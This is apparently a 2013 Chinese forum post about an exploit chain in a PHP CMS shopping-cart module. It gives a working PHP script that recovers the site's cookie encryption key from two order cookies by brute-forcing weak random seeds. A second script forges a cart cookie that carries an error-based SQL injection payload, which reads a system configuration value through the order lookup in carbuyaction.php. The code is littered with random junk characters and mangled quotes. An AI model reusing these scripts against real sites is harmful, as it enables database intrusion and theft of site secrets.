www.xxx.com/plus/search.php?keyword=
$ K; T. ~5 D8 h. E* l在 include/shopcar.class.php中
9 f+ d0 M' V# X# `6 }0 n先看一下这个shopcar类是如何生成cookie的
0 M3 O8 u7 E; k. o: v! |0 u239 function saveCookie($key,$value)
/ W/ p) B3 s3 e1 I" T8 q240 {3 x8 }, @. ^7 p* `5 I; w3 d
241 if(is_array($value))1 A$ J3 V( W' `& M
242 {
4 F. E# o/ g1 z5 H) }, I7 s243 $value = $this->enCrypt($this->enCode($value));
9 W, Q4 b' ?6 ?/ t. ~. x244 }
9 z: J) U2 f4 i5 I# a/ C245 else p' D- X$ h J, ^ r
246 {) g h9 ~& [( S1 b5 y
247 $value = $this->enCrypt($value);2 {6 {5 ~3 k! L$ ? A$ e* A$ d. e( Y2 d
248 }
0 Y+ F9 ~) n. d9 r249 setcookie($key,$value,time()+36000,’/');7 d3 M6 z8 |1 }; ?9 f. l" F
250 }( ~ {# _- E5 }1 S( k$ J# c
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数; U# n% C1 r/ n
186 function enCrypt($txt): J) K B% G, C1 k. x' B2 [, y+ n
187 {' M. V. n3 C7 Q: {) r
188 srand((double)microtime() * 1000000);
/ {, S. @- ]) u$ y189 $encrypt_key = md5(rand(0, 32000));) c$ j' U8 P& U
190 $ctr = 0;
7 B3 R% x) C! b$ e191 $tmp = ”;* y: h) h0 O' m" c! a$ N
192 for($i = 0; $i < strlen($txt); $i++)( [$ k7 w5 v5 i6 I
193 {+ ?8 z& t; e( r6 g$ `1 ]
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;; H- T/ {& z7 R$ Q$ m4 U/ v* Y
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);# ` {, R C/ e/ j1 K0 w1 ~1 g
196 }
% G) q# D& t, P& J5 o197 return base64_encode($this->setKey($tmp));
- w" ?/ x' \: x* U) H' t5 Z198 }1 q# n l% h5 |+ u+ z% {' u/ m
213 function setKey($txt)' t3 R e1 S l5 c# M
214 {
2 @" f" l. r! u! f1 x0 q+ E- O215 global $cfg_cookie_encode;* y9 O+ s4 Q P! e3 Q7 ^
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
7 p5 r: }. D% ?7 e, q1 _) d! s217 $ctr = 0;, O; q& w2 l$ F5 A
218 $tmp = ”;! x" ?5 t x5 m$ Q; S
219 for($i = 0; $i < strlen($txt); $i++). G1 [2 u4 C8 y8 B4 A
220 {
]; v6 d( ]" ~% W: Y221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
4 D' X$ m: n; F" X222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
! i- ?- k4 w2 b! V1 g! Q" M223 }
& A$ W! Q% o* K/ F; _224 return $tmp;
$ |3 [) a% ^+ G! `( N225 }& l# n' e3 Z/ ~# P4 W0 j$ H" d
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的; [$ R y* S' y$ G3 y4 B, ~1 S% m
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。# \- h% T0 h1 v
具体代码如下:
V r" G, r: v* q- j- ^: D<?php# k0 o3 X! ~ f# u a4 ^
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here# p4 |4 `& b5 m4 ^# m4 P9 \
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here2 |, q: E1 |" m( V8 U) I+ s( _
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here0 k( g' w# G, r2 _5 O* `
function reStrCode($code,$string)' l$ D' |+ \* b6 l! R
{+ _! Z; P, M8 ]( P9 U% g- `% d
$code = base64_decode($code);& _ S: a# i' \& c
$key = “”;' V* @+ u+ Y2 I( O- u( w8 n% J
for($i=0 ; $i<32 ; $i++)( a0 i" O5 ]# J& C7 y
{$ W% L1 K5 a* y) t0 {, q% |
$key .= $string[$i] ^ $code[$i];+ h1 m8 S( S- ?
}) @' d6 A8 v! Z$ v
return $key;- u% `2 r! V# m K9 U" i0 M, ~7 h
}
8 v3 t P F1 Z8 z6 `: q( }function getKeys($cookie,$plantxt)
& d* k$ @4 b$ O9 b, B0 `{. C4 v' T: |7 H* G7 |
$tmp = $cookie;5 L5 L& R5 R* E! \7 b
$results = array();3 m0 `& J* A" l3 W
for($j=0 ; $j < 32000; $j++) N5 j$ ~. T) j9 A
{
0 z- s1 w4 v7 h! C* B. l
+ b- s7 o* X5 A$txt = $plantxt;) @- t6 U. G* J9 O# f
$ctr = 0;: _& Y3 {. N0 F) T4 }7 `2 k$ I
$tmp = ”;
: d7 o" M% B: a; B- I( ~/ T9 C$encrypt_key = md5($j);
( t! Z: _7 g% B) U4 v) r$ `$ ufor($i =0; $i < strlen($txt); $i ++)3 u& N5 \; ^. Z3 g
{, o9 P; K, d( ]+ L1 D2 v
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;4 C1 {. u' t! D. E
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
) D1 z1 E/ l& x% k! ^}
6 f9 Y+ R. A7 ^3 [5 K$string = $tmp;3 u! A$ q* ]2 y4 k2 W
$code = $cookie;1 `, ^6 W7 O6 ]9 M+ i. c1 O
$result = reStrCode($code,$string);; `/ U" n1 r2 Q
if(eregi(‘^[a-z0-9]+$’,$result))
; k8 R' Q) u7 o8 x7 r8 `{% f! R7 ?& k' U
echo $result.”\n”;
' K) @# }3 |' i$ D( ?$results[] = $result;) d" M0 Q( l0 M' S
}
6 I4 e- |5 F/ V; D( V) Z% J}( i) s7 t0 V4 a8 y7 I3 t
return $results;) P/ `2 J4 c, V
}! W4 e# ^1 y: G1 O9 c
$results1 = getKeys($cookie1,$plantxt);
; T. @6 I' b0 Y$ U7 [7 [. J/ s |6 n8 U$results2 = getKeys($cookie2,$plantxt);
$ q; f& G5 f' U' K1 J& W: Dprint “\n——————–real key————————–\n”;
+ W) Q# p7 [ [; I- k+ C' |foreach($results1 as $test1)
; Q u4 l4 _) H# u/ q{% u2 y- l1 _% [. L2 B
foreach($results2 as $test2)
9 |; v: P0 |( D; Y1 R{
) A& d4 g+ [ D1 W, cif($test1 == $test2)
- \( ?+ k% V' J) v7 Z{! b" B. L% H& l( }$ }9 t$ ]
echo $test1.”\n”;; C2 |: o$ B) @9 v
}
: `3 R2 g& _. m" M3 B' \0 K* r}
: U7 O3 L. d7 Z}
. v- {. Y0 q3 K?>
# p! ^7 G* ]. x0 acookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
2 b2 A0 E, ]9 Pplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1; v9 }- [6 c) {8 k% V4 ^% S
然后推算出md5(strtolower($cfg_cookie_encode))
) b- c/ s, n) B* h得到这个key之后,我们就可以构造任意购物车的cookie* m# s0 t( s, P* J
接着看
, c) \7 Y; K' z- L- F20 class MemberShops$ K/ ^) y8 ?1 r' ?5 C
21 {) |# O* G& n1 N% ~; ^8 p
22 var $OrdersId;
$ Z' @+ F" ~8 w/ M, l23 var $productsId;; T5 ?& m7 M. W5 e* f
24
+ b- y% t4 d! r) K! L25 function __construct()
& \8 R8 w1 c" G26 {
2 W! F$ @+ u2 V27 $this->OrdersId = $this->getCookie(“OrdersId”);
k6 G9 O% v0 o- x+ ]28 if(empty($this->OrdersId))
: Z; Z* U9 t3 x* ~* u/ z* f4 ]0 I29 {
" c5 U0 U' r# l3 G30 $this->OrdersId = $this->MakeOrders();0 v; Z' d1 e6 U; g r
31 }
3 x. Y9 O: r! W+ v. S' c32 }% V3 B$ Z1 X$ m: r. Q, A: H
发现OrderId是从cookie里面获取的: u) l' J+ W% x) d6 ]& F. @
然后/ E- S% m% _. J) q, J* y- K* ~3 o2 {
/plus/carbuyaction.php中的
# A5 W% E( Y0 `! g29 $cart = new MemberShops();
7 ]# v c. n+ w* a' h39 $OrdersId = $cart->OrdersId; //本次记录的订单号
" e# {5 \8 s0 G7 v' L4 q- c……
" _+ f* l f0 d" c$ j173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
* Y9 E- k2 w' P1 O! D7 D2 K# x接着我们就可以注入了
+ x2 W& o' a! l5 Q" v通过利用下面代码生成cookie:( T$ f2 K7 V, b
<?php
5 r/ ~6 @3 F' `# d4 }$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
0 ?9 p; g8 q, h& |8 q U$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here. o, v* Y' O1 ? S
function setKey($txt)
9 l+ f9 c! @5 q/ j{
/ l# B2 t; | g5 K# n4 iglobal $encrypt_key;( a+ o- ~0 {6 R0 U- ]6 ~
$ctr = 0;- A7 Y! l: P' n1 F
$tmp = ”;
- I: n3 z* J7 _& k9 v, rfor($i = 0; $i < strlen($txt); $i++)! l% D5 j) X9 s8 h
{8 `' h4 n \. H. Q; y/ Z+ B
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;2 }8 x( i0 H# W
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];5 R. E: \; F4 ~' R f- g4 N; n: Z6 I
}
5 A" X8 @- W! G d8 E! }return $tmp;3 E# U* B- z$ B/ T" W8 z9 p
}
; A0 Z1 l& r2 [ c# B S2 p( c0 ifunction enCrypt($txt)7 k! t1 f. e/ _* Z, S5 w
{
% k7 m( S3 Z esrand((double)microtime() * 1000000);
# w( R0 d& g( q' @. N! h I$encrypt_key = md5(rand(0, 32000));- k: M: U+ B j* W& \: M0 P" J: K
$ctr = 0;% I- g ~0 ^" Y7 Q' Z- o( C2 h9 m
$tmp = ”;( y7 o% a" V2 i/ z I
for($i = 0; $i < strlen($txt); $i++)
$ h5 G3 j9 R! B, V{" w. O% }. Z8 E9 K- k7 Q
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;: m! F( A# W$ h4 `, V
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
8 m0 B- }) N% s8 v}
% O; M8 ` e4 L- H& h9 @0 F8 Dreturn base64_encode(setKey($tmp));7 @0 s6 t- ?" F1 B
}
2 `2 r5 V9 A4 L$ a4 hfor($dest =0;$dest = enCrypt($txt);): H4 v5 G) n5 } u" n0 d* W1 e
{
/ ~% h; m8 H/ Y& B0 Oif(!strpos($dest,’+'))
$ m o" F _+ W# l; _2 c' o7 M{
. f C- E' s* fbreak;
: }6 v1 c' A2 u/ o7 I}
0 ?! [2 J. e. t1 r( {6 b}
' c& Y$ U7 L7 t% y$ H: Y$ n% mecho $dest.”\n”;
4 C1 s; A( [2 X* @' c! k$ M" _?> o" n+ n3 b7 V7 g" e8 @
7 m" O! a2 v# X$ d. p$ O, y
|
发表于 2013-2-13 23:58:29
收藏
支持
反对